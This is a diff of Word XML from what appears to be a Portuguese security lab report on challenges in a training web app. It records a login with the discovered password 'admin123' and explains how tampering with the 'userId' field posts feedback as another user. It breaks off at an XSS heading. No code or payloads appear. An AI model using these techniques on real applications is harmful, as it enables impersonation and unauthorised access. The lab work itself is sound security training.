+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4873A84A" wp14:editId="3D7E35E3">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-381000</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1642110</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="6699885" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="1403448271" name="Text Box 1"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6699885" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figura </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t>14</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> - Pedido com 200 OK, ou seja, login efetuado com sucesso com a palavra-chave admin123</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> (Password descoberta)</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="4873A84A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:-30pt;margin-top:129.3pt;width:527.55pt;height:.05pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figura </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:fldChar w:fldCharType="begin"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+                      </w:r>
+                      <w:r>
+                        <w:fldChar w:fldCharType="separate"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t>14</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:fldChar w:fldCharType="end"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> - Pedido com 200 OK, ou seja, login efetuado com sucesso com a palavra-chave admin123</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> (Password descoberta)</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1674AE68" wp14:editId="47D765F4">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>289560</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6699885" cy="1295400"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+            <wp:wrapNone/>
+            <wp:docPr id="2099290391" name="Picture 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6699885" cy="1295400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5474E6" wp14:editId="37DF9208">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="899307979" name="Rectangle 12"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="6287D8F4" id="Rectangle 12" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="038E0D02" wp14:editId="3A2187B0">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="1833856896" name="Rectangle 13"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="48A13B97" id="Rectangle 13" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:ind w:left="576" w:hanging="576"/>
+      </w:pPr>
+      <w:r>
+        <w:t>O desafio</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Post some feedback in another user’s name</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E8A0B07" wp14:editId="40ACAA40">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>29845</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>370205</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5960633" cy="2750820"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapNone/>
+            <wp:docPr id="1358181725" name="Picture 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5960633" cy="2750820"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Um pedido é enviado, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>com o utilizador anónimo, onde se pode ver que o parâmetro “userId” é nulo. Este feedback é anónimo portanto não esta associado a nenhum utilizador da aplicação.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Enviar o pedido outra vez, mas alterando o seu payload com um valor inteiro no “userId”, o feedback que é publicado na aplicação apesar de ter sido enviado por um utilizador anónimo é visto pela mesma como sido efetuado por um utilizador autenticado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F4397AF" wp14:editId="39BA71CD">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:posOffset>137160</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>43180</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5823919" cy="2072640"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
+            <wp:wrapNone/>
+            <wp:docPr id="789404212" name="Picture 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5823919" cy="2072640"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:left="600" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>cross-site scripting (xss)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
